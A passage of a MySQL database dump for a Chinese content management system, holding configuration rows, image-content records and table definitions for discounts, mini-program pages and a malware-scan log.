INSERT INTO `ey_config` VALUES ('93', 'smtp_syn_weapp', '1', 'smtp', '', 'cn', '0', '1559187944');
INSERT INTO `ey_config` VALUES ('94', 'system_auth_code', '$2y$11$574ffd130eecb61a99ff84b', 'system', '', 'cn', '0', '1613985954');
INSERT INTO `ey_config` VALUES ('97', 'system_smtp_tpl_5', '1', 'system', '', 'cn', '0', '1613986020');
INSERT INTO `ey_config` VALUES ('98', 'syn_gb_attribute_showlist', '1', 'syn', '', 'cn', '0', '1613986020');
INSERT INTO `ey_config` VALUES ('99', 'syn_admin_logic_sms_template', '1', 'syn', '', 'cn', '0', '1613986020');
INSERT INTO `ey_config` VALUES ('100', 'php_weapp_plugin_open', '1', 'php', '', 'cn', '0', '1686213569');
INSERT INTO `ey_config` VALUES ('101', 'syn_admin_logic_unlink', '1', 'syn', '', 'cn', '0', '1613986020');
INSERT INTO `ey_config` VALUES ('102', 'syn_admin_logic_update_basic', '1', 'syn', '', 'cn', '0', '1613986020');
INSERT INTO `ey_config` VALUES ('95', 'system_robots_edit', '1', 'system', '', 'cn', '0', '1613985993');
INSERT INTO `ey_config` VALUES ('96', 'system_synleveldata', '1', 'system', '', 'cn', '0', '1613985993');
INSERT INTO `ey_config` VALUES ('103', 'syn_admin_logic_update_tag', '1', 'syn', '', 'cn', '0', '1613986020');
INSERT INTO `ey_config` VALUES ('104', 'syn_admin_logic_update_arctype', '1', 'syn', '', 'cn', '0', '1613986020');
INSERT INTO `ey_config` VALUES ('105', 'php_serviceinfo', 'c305AQlRCQFVBgEHVQEHVQZcDgcHVwMNXlZWBA1OQ0BWVhFUVxJQRQxAVBVfQFcFC0ANLlpjJWwcWVhvRlkXVlh6BH5qVVVEAGBbeAQGEBNTAA0DZFFUVhdtdm1OWhVuSVgIa1YvX34EU0BCBDcQE1MADgN4fVREFwV2bUxcAwV6egR+WCpPfgRMQHZUWi0dOFBaOnYFKENXDWtQUX8JQAIMV1BqDwwFCH51bx8PEC8EVk4NAw9DGERUR0FcWhNRWlgHXEoGGwtHakQPBwRVOBcNClEHbhQBBAwKaUECBwICaBcFXFFbbRAOVwABPhdQBwkLPkIGBAUHaUcCBgFZa0YCUQkBPUwHUgICaxBUV1xVZE1WUlRXaBNTVAUFF00VUkEWWVYTVEICBxMNRz4XXABdDT5CB1MNAGlHDQRTBWtGAAdSDD1MCFMDAWsQV1dQVGRNVlIDAGgTAwENDGkUAQQAUW1MVA5VA2pEAlFSBjgXXl5SBhBNFgdARl1bRwxEVAZACxs9TAkHUwRrEFdQXQRkTVoHVAVoEwFXVgFpFA4FAVJtTFVcAFZqRAMAUwM4Fw8KVg9uFAJVDQppQQNWAwBoFwQOBV9tEAMFBwE+FwIECAlAGxAAQRJdXUdZRgYGHQFACxs9TAkHUwRrEFdQXQRkTVoHVAVoEwFXVgFpFA4FAVJtTFVcAFZqRAMAUwM4Fw8KVg9uFAJVDQppQQNWAwBoFwQOBV9tEAMFBwE+FwIECAlAGxAAQBdAV0dNRwRGRlERRRtbG1Qcf0Z+DxJVLQ9uDAFwXhhuMAwCVGMEDX5ZWxp8UwoLfCF3RlE2FQspMXEOB054DVEud0JWWWMHU3RYFmtqKA9+IW8BeiEjFQIxT1EvZAZQfQxFBXxZY1VUdFgba29YCVAyB11+Dw1WKghpTy9zcFh4JXxLfF5FVn5eYlZSfg1AazMPAVYyUw4tCFcMLF1jFnkidwtTZQhcFR8WC1UbWw8dR1RETgwGQF5AGhRAU10MVQ9bEA8WUBhYRhoKWhtNG1IKUlQVX0BTBlYJXgRSAgAGX1ACA1cDU1FQA1sCDFdfBQQDCVUHB0BIQF1AEl5ABEc5XFwXDgVNFUdGG15MFWZFDFtUFV9STkYBVFcRUm0WUQQXCAUYFxRHV1sPUFAPZl8QWxMNVU5ADQxMSg0VCEMWShdHXFAXWwcfFhdCXBNQVUcME1YBDwsKQBQaAFZbBUE5Vl1AWkFDDQMYQEZcAElBOkZdQgILDDsNSF0MFQhQGERFW1EWD1MbEV0RblYNXRNfBh0VFhYDEBdLGlgGHkNdFWpWUFgXWwcfFgNVXT5NWAhTEw1UV1dVUAAPWgcKTRYTRVZUQFA+Q1pZBxMDUA8CUQEJBVZbUkhASFASaFMNWAlCbUZRRxdeUFE9XkpDAxMAT3tdB1AwCCtSVxp7cStABQdRXHtcK1RXYDsFYBt7UgFia1wrJSgHBmxtG3pII1cCYWsEbV8jVFdgAUh3JVFSAWJoBCgPLw0ue3IWVAACTC9fXVxsfTQGfWAzA2EpbAIrYngDPSo3Vy9SaVZvejQGKE94X2x9NAV9YChcYSlsAyhMcE89KjdVLEJxVm96NAc8YnhYbH00BX1ZOwFhKWwDK2F4QCwMUllARQ', 'php', '', 'cn', '0', '1686213569');
INSERT INTO `ey_config` VALUES ('106', 'php_servicecode', '1b41ffe0a29e06c62fc79356f4a58bbe', 'php', '', 'cn', '0', '1686213557');
INSERT INTO `ey_config` VALUES ('107', 'syn_admin_logic_video_addfields', '5', 'syn', '', 'cn', '0', '1651715309');
INSERT INTO `ey_config` VALUES ('108', 'syn_admin_logic_special_addfields', '5', 'syn', '', 'cn', '0', '1651715309');
INSERT INTO `ey_config` VALUES ('109', 'syn_admin_logic_session_conf', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('110', 'syn_admin_logic_add_tag', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('111', 'syn_admin_logic_users_parameter', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('112', 'syn_admin_logic_users_download', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('113', 'syn_admin_logic_arctype_topid2', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('114', 'syn_admin_logic_check_oneself', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('115', 'syn_admin_logic_links_group', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('116', 'sms_type', '1', 'sms', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('117', 'syn_admin_logic_1608189503', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('118', 'download_select_servername', 'a:6:{i:0;s:12:\"立即下载\";i:1;s:15:\"本地服务器\";i:2;s:15:\"远程服务器\";i:3;s:12:\"百度网盘\";i:4;s:15:\"七牛云存储\";i:5;s:12:\"腾讯网盘\";}', 'download', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('119', 'syn_admin_logic_1608191377', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('120', 'system_paginate_pagesize', '20', 'system', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('121', 'web_theme_color', '#3398cc', 'web', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('122', 'web_assist_color', '#2189be', 'web', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('123', 'web_loginbgimg', '', 'web', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('124', 'syn_admin_logic_1609039608', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('125', 'syn_admin_logic_1609291091', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('126', 'admin_logic_1610086647', '1', 'syn', '', 'cn', '0', '1613986047');
INSERT INTO `ey_config` VALUES ('127', 'syn_admin_logic_video_addfields_2', '1', 'syn', '', 'cn', '0', '1651715309');
INSERT INTO `ey_config` VALUES ('128', 'syn_admin_logic_1608884981_2', '1', 'syn', '', 'cn', '0', '1651715309');
INSERT INTO `ey_config` VALUES ('129', 'system_correctarctypedirpath', '1', 'system', '', 'cn', '0', '1651715312');
INSERT INTO `ey_config` VALUES ('130', 'php_servicemeal', '2', 'php', '', 'cn', '0', '1686213557');
INSERT INTO `ey_config` VALUES ('131', 'system_crypt_auth_code', '$2y$11$574ffd130eecb61a99ff84b', 'system', '', 'cn', '0', '1668565022');
INSERT INTO `ey_config` VALUES ('132', 'web_citysite_open', '0', 'web', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('133', 'web_adminlogo', '', 'web', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('134', 'web_loginlogo', '', 'web', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('135', 'syn_admin_logic_1608884981', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('136', 'syn_admin_logic_arctype_topid', '2', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('137', 'syn_admin_logic_balance_pay', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('138', 'basic_img_style_wh', '0', 'basic', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('139', 'syn_admin_logic_1610086648', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('140', 'syn_admin_logic_1614829120', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('141', 'syn_admin_logic_1614829121', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('142', 'syn_admin_logic_1616123192', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('143', 'syn_admin_logic_ask_answer_like', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('144', 'syn_admin_logic_archives_1618279798', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('145', 'admin_logic_1_1648775669', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('146', 'syn_admin_logic_1623036205', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('147', 'admin_logic_1623055490', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('148', 'system_use_language', '0', 'system', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('149', 'admin_logic_1623133485', '1', 'syn', '', 'cn', '0', '1668569108');
INSERT INTO `ey_config` VALUES ('150', 'other_pcwapjs', '0', 'other', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('151', 'seo_uphtml_after_home', '0', 'seo', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('152', 'seo_uphtml_after_channel', '1', 'seo', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('153', 'seo_uphtml_after_pernext', '1', 'seo', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('154', 'seo_html_templet', 'index.htm', 'seo', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('155', 'seo_html_position', '../index.html', 'seo', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('156', 'seo_showmod', '1', 'seo', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('157', 'seo_maxpagesize', '50', 'seo', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('158', 'seo_upnext', '1', 'seo', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('159', 'seo_pagesize', '20', 'seo', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('160', 'basic_img_auto_wh', '0', 'basic', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('161', 'basic_img_alt', '0', 'basic', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('162', 'basic_img_title', '0', 'basic', '', 'cn', '0', '1668569109');
INSERT INTO `ey_config` VALUES ('163', 'seo_html_arcdir', 'html', 'seo', '', 'cn', '0', '1686213562');
-- -----------------------------
-- Table structure for `ey_config_attribute`
-- -----------------------------
DROP TABLE IF EXISTS `ey_config_attribute`;
CREATE TABLE `ey_config_attribute` (
`attr_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '表单id',
`inc_type` varchar(20) DEFAULT '' COMMENT '变量分组',
`type_id` int(11) unsigned DEFAULT '1',
`attr_name` varchar(60) DEFAULT '' COMMENT '变量标题',
`attr_var_name` varchar(50) DEFAULT '' COMMENT '变量名',
`attr_input_type` tinyint(1) unsigned DEFAULT '0' COMMENT ' 0=文本框,1=下拉框,2=多行文本框,3=上传图片',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`attr_id`)
) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COMMENT='留言表单属性';
-- -----------------------------
-- Records of `ey_config_attribute`
-- -----------------------------
INSERT INTO `ey_config_attribute` VALUES ('1', 'web', '1', '网站公告', 'web_attr_1', '0', 'cn', '1533544029', '1686213619');
INSERT INTO `ey_config_attribute` VALUES ('2', 'web', '1', '手机号码', 'web_attr_2', '0', 'cn', '1533550261', '1686213619');
INSERT INTO `ey_config_attribute` VALUES ('3', 'web', '1', '地址', 'web_attr_3', '0', 'cn', '1533550302', '1686213619');
INSERT INTO `ey_config_attribute` VALUES ('4', 'web', '1', '电话', 'web_attr_4', '0', 'cn', '1533550375', '1686213619');
INSERT INTO `ey_config_attribute` VALUES ('5', 'web', '1', '邮箱', 'web_attr_5', '0', 'cn', '1533550438', '1686213619');
INSERT INTO `ey_config_attribute` VALUES ('6', 'web', '1', '微信二维码', 'web_attr_6', '3', 'cn', '1533607848', '1686213619');
INSERT INTO `ey_config_attribute` VALUES ('7', 'web', '1', 'QQ客服', 'web_attr_7', '0', 'cn', '1533608360', '1686213619');
-- -----------------------------
-- Table structure for `ey_config_type`
-- -----------------------------
DROP TABLE IF EXISTS `ey_config_type`;
CREATE TABLE `ey_config_type` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`type_name` varchar(255) DEFAULT '' COMMENT '分组名称',
`status` tinyint(1) DEFAULT '1',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`sort_order` int(11) DEFAULT '100' COMMENT '排序',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='自定义变量分组表';
-- -----------------------------
-- Records of `ey_config_type`
-- -----------------------------
INSERT INTO `ey_config_type` VALUES ('1', '默认分组', '1', 'cn', '1650271499', '1650271499', '100');
-- -----------------------------
-- Table structure for `ey_cp_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_cp_content`;
CREATE TABLE `ey_cp_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`content` longtext COMMENT '内容详情',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=19 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_cp_content`
-- -----------------------------
INSERT INTO `ey_cp_content` VALUES ('1', '15', '1555053555', '1555053555', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/bcd617212957c9dc6a5412c58c7446d5.jpg" title="bcd617212957c9dc6a5412c58c7446d5.jpg" alt="bcd617212957c9dc6a5412c58c7446d5.jpg"/></p>');
INSERT INTO `ey_cp_content` VALUES ('2', '16', '1555053579', '1555053579', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/85ff99bfd9efbd4e1ae17dc2ead76035.jpg" title="85ff99bfd9efbd4e1ae17dc2ead76035.jpg" alt="85ff99bfd9efbd4e1ae17dc2ead76035.jpg"/></p>');
INSERT INTO `ey_cp_content` VALUES ('3', '17', '1555053594', '1555053594', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/1c763a29611a28b4b5f9f000b3481a0c.jpg" title="1c763a29611a28b4b5f9f000b3481a0c.jpg" alt="1c763a29611a28b4b5f9f000b3481a0c.jpg"/></p>');
INSERT INTO `ey_cp_content` VALUES ('4', '18', '1555053608', '1555053608', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/98763fb03fa81c201889ea0c26e7490e.jpg" title="98763fb03fa81c201889ea0c26e7490e.jpg" alt="98763fb03fa81c201889ea0c26e7490e.jpg"/></p>');
INSERT INTO `ey_cp_content` VALUES ('5', '19', '1555053624', '1555053624', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/ee4dff6a00936118779ae001f252725e.jpg" title="ee4dff6a00936118779ae001f252725e.jpg" alt="ee4dff6a00936118779ae001f252725e.jpg"/></p>');
INSERT INTO `ey_cp_content` VALUES ('6', '20', '1555053639', '1555053639', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/6d8a523e021f2229eee481b33e1bf54c.jpg" title="6d8a523e021f2229eee481b33e1bf54c.jpg" alt="6d8a523e021f2229eee481b33e1bf54c.jpg"/></p>');
INSERT INTO `ey_cp_content` VALUES ('7', '21', '1555053764', '1555053764', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/261db2db709dc3c012a18d88c6844159.png" title="261db2db709dc3c012a18d88c6844159.png" alt="261db2db709dc3c012a18d88c6844159.png"/></p>');
INSERT INTO `ey_cp_content` VALUES ('8', '22', '1555053778', '1555053778', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/ae58acdec7b6e9585ee2beba5d14a652.png" title="ae58acdec7b6e9585ee2beba5d14a652.png" alt="ae58acdec7b6e9585ee2beba5d14a652.png"/></p>');
INSERT INTO `ey_cp_content` VALUES ('9', '23', '1555053794', '1555053794', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/82eb83d1842cfbed36c1c1700faf3b68.png" title="82eb83d1842cfbed36c1c1700faf3b68.png" alt="82eb83d1842cfbed36c1c1700faf3b68.png"/></p>');
INSERT INTO `ey_cp_content` VALUES ('10', '24', '1555053920', '1555053920', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/19f0405d149bcd41ec20b2dbb089f004.png" title="19f0405d149bcd41ec20b2dbb089f004.png" alt="19f0405d149bcd41ec20b2dbb089f004.png"/></p>');
INSERT INTO `ey_cp_content` VALUES ('11', '25', '1555053934', '1555053934', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/a6c87d8626dc0763ec0a29e886957442.png" title="a6c87d8626dc0763ec0a29e886957442.png" alt="a6c87d8626dc0763ec0a29e886957442.png"/></p>');
INSERT INTO `ey_cp_content` VALUES ('12', '26', '1555053950', '1555053950', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/df517acf1c9cc0c7ce64cf4d4acd6007.png" title="df517acf1c9cc0c7ce64cf4d4acd6007.png" alt="df517acf1c9cc0c7ce64cf4d4acd6007.png"/></p>');
INSERT INTO `ey_cp_content` VALUES ('13', '27', '1555054000', '1555054000', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/d3db198cedafd09ff66d32f7a021c3d9.png" title="d3db198cedafd09ff66d32f7a021c3d9.png" alt="d3db198cedafd09ff66d32f7a021c3d9.png"/></p>');
INSERT INTO `ey_cp_content` VALUES ('14', '28', '1555054012', '1555054012', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/2ee2205244719343d6e10ed6d0ee347f.png" title="2ee2205244719343d6e10ed6d0ee347f.png" alt="2ee2205244719343d6e10ed6d0ee347f.png"/></p>');
INSERT INTO `ey_cp_content` VALUES ('15', '29', '1555054025', '1555054025', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/316a0cd9a5a644cc9a4eff69291c065c.png" title="316a0cd9a5a644cc9a4eff69291c065c.png" alt="316a0cd9a5a644cc9a4eff69291c065c.png"/></p>');
INSERT INTO `ey_cp_content` VALUES ('16', '30', '1555054039', '1555054039', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/132289025f8a3c3e156605143b2d81d7.png" title="132289025f8a3c3e156605143b2d81d7.png" alt="132289025f8a3c3e156605143b2d81d7.png"/></p>');
INSERT INTO `ey_cp_content` VALUES ('17', '31', '1555054204', '1555054204', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/a9a301b263d459d02328394d11762573.png" title="a9a301b263d459d02328394d11762573.png" alt="a9a301b263d459d02328394d11762573.png"/></p>');
INSERT INTO `ey_cp_content` VALUES ('18', '32', '1555054216', '1555054216', '<p style="text-align: center;"><img src="/uploads/ueditor/20190412/65137ee3f9b70f15fa3b11cfaac0da5a.png" title="65137ee3f9b70f15fa3b11cfaac0da5a.png" alt="65137ee3f9b70f15fa3b11cfaac0da5a.png"/></p>');
-- -----------------------------
-- Table structure for `ey_cs_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_cs_content`;
CREATE TABLE `ey_cs_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`wzwz` varchar(200) NOT NULL DEFAULT '' COMMENT '网址',
`ico` varchar(250) NOT NULL DEFAULT '' COMMENT '图标',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_cs_content`
-- -----------------------------
INSERT INTO `ey_cs_content` VALUES ('1', '27', '1614155119', '1614155119', 'https://www.bt.cn/', '/uploads/allimg/20190228/339b80f3d43d9a348a98746c502e28a1.jpg');
-- -----------------------------
-- Table structure for `ey_custom_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_custom_content`;
CREATE TABLE `ey_custom_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`miaoshu` text COMMENT '文章描述',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_custom_content`
-- -----------------------------
INSERT INTO `ey_custom_content` VALUES ('1', '6', '1551752806', '1551752806', '适用于大型、中型、小型以及快速成长型企业的解决方案');
INSERT INTO `ey_custom_content` VALUES ('2', '7', '1551752824', '1551752824', '适用于大型、中型、小型以及快速成长型企业的解决方案');
INSERT INTO `ey_custom_content` VALUES ('3', '8', '1551752838', '1551752838', '适用于大型、中型、小型以及快速成长型企业的解决方案');
INSERT INTO `ey_custom_content` VALUES ('4', '9', '1551752853', '1551752853', '适用于大型、中型、小型以及快速成长型企业的解决方案');
-- -----------------------------
-- Table structure for `ey_ddos_log`
-- -----------------------------
DROP TABLE IF EXISTS `ey_ddos_log`;
CREATE TABLE `ey_ddos_log` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`md5key` varchar(50) DEFAULT '' COMMENT 'md5值',
`file_name` varchar(500) DEFAULT '' COMMENT '文件名',
`file_num` int(10) DEFAULT '0' COMMENT '已扫描数',
`file_total` int(10) DEFAULT '0' COMMENT '总文件数',
`file_num_ky` int(10) DEFAULT '0' COMMENT '可疑恶意文件数',
`is_suspicious` tinyint(1) DEFAULT '0' COMMENT '是否可疑',
`html` text,
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='ddos查杀进度记录表';
-- -----------------------------
-- Table structure for `ey_discount_active`
-- -----------------------------
DROP TABLE IF EXISTS `ey_discount_active`;
CREATE TABLE `ey_discount_active` (
`active_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '活动会场ID',
`active_name` varchar(255) DEFAULT '' COMMENT '活动名称',
`start_date` int(11) unsigned DEFAULT '0' COMMENT '活动开始时间',
`end_date` int(11) DEFAULT '0' COMMENT '活动结束时间',
`limit_type` tinyint(3) unsigned DEFAULT '1' COMMENT '限购类型 1-不限购,2-活动期内每人最多购买n件,3-活动期内每人每天最多购买n件',
`limit` int(11) unsigned DEFAULT '0' COMMENT '限购数量',
`preheat` tinyint(3) DEFAULT '0' COMMENT '是否开启预热 0-关闭 1-开启',
`preheat_time` int(11) DEFAULT '0' COMMENT '预热时间,不能大于开启时间',
`status` tinyint(3) unsigned NOT NULL DEFAULT '1' COMMENT '活动状态(0禁用 1启用)',
`is_del` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT '是否删除',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`active_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='限时折扣-活动会场表';
-- -----------------------------
-- Table structure for `ey_discount_active_goods`
-- -----------------------------
DROP TABLE IF EXISTS `ey_discount_active_goods`;
CREATE TABLE `ey_discount_active_goods` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键ID',
`active_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '活动ID',
`aid` int(11) NOT NULL DEFAULT '0' COMMENT '文档id',
`discount_goods_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '秒杀商品ID',
`sales_actual` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '实际销量',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='限时折扣-活动会场与商品关联表';
-- -----------------------------
-- Table structure for `ey_discount_goods`
-- -----------------------------
DROP TABLE IF EXISTS `ey_discount_goods`;
CREATE TABLE `ey_discount_goods` (
`discount_gid` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '限时折扣商品ID',
`aid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '商品ID->aid',
`discount_stock` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '限时折扣商品库存总量',
`discount_price` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '限时折扣价格',
`sales` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '累积销量',
`virtual_sales` int(11) NOT NULL DEFAULT '0' COMMENT '虚拟销量',
`sort_order` int(11) unsigned NOT NULL DEFAULT '100' COMMENT '商品排序(数字越小越靠前)',
`status` tinyint(3) unsigned NOT NULL DEFAULT '1' COMMENT '商品状态(0下架 1上架)',
`is_del` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT '是否删除',
`is_sku` tinyint(1) NOT NULL DEFAULT '0' COMMENT '1-多规格商品',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`discount_gid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='限时折扣-商品表';
-- -----------------------------
-- Table structure for `ey_diyminipro`
-- -----------------------------
DROP TABLE IF EXISTS `ey_diyminipro`;
CREATE TABLE `ey_diyminipro` (
`mini_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '模板ID',
`categoryid` int(11) NOT NULL DEFAULT '0' COMMENT '分类ID',
`name` varchar(100) NOT NULL DEFAULT '' COMMENT '模板标题',
`litpic` varchar(250) NOT NULL DEFAULT '' COMMENT '封面图',
`component` text NOT NULL COMMENT '组件库',
`status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '状态:4=审核中,5=发布',
`cloud_id` int(10) NOT NULL DEFAULT '0' COMMENT '云ID',
`config` text NOT NULL COMMENT '相关序列化信息',
`is_del` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '伪删除,1=是,0=否',
`lang` varchar(10) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`mini_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='微信小程序记录表';
-- -----------------------------
-- Table structure for `ey_diyminipro_page`
-- -----------------------------
DROP TABLE IF EXISTS `ey_diyminipro_page`;
CREATE TABLE `ey_diyminipro_page` (
`page_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '页面id',
`page_type` tinyint(3) NOT NULL DEFAULT '-1' COMMENT '页面类型(1首页 -1自定义页)',
`page_name` varchar(255) NOT NULL DEFAULT '' COMMENT '页面名称',
`page_data` longtext NOT NULL COMMENT '页面数据',
`mini_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '微信小程序id',
`is_home` tinyint(1) NOT NULL DEFAULT '0' COMMENT '设为首页:0=否,1=是',
`is_system` tinyint(1) NOT NULL DEFAULT '0' COMMENT '系统内置',
`is_show` tinyint(1) NOT NULL DEFAULT '1' COMMENT '是否显示:1=显示,0=隐藏',
`is_del` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT '伪删除,1=是,0=否',
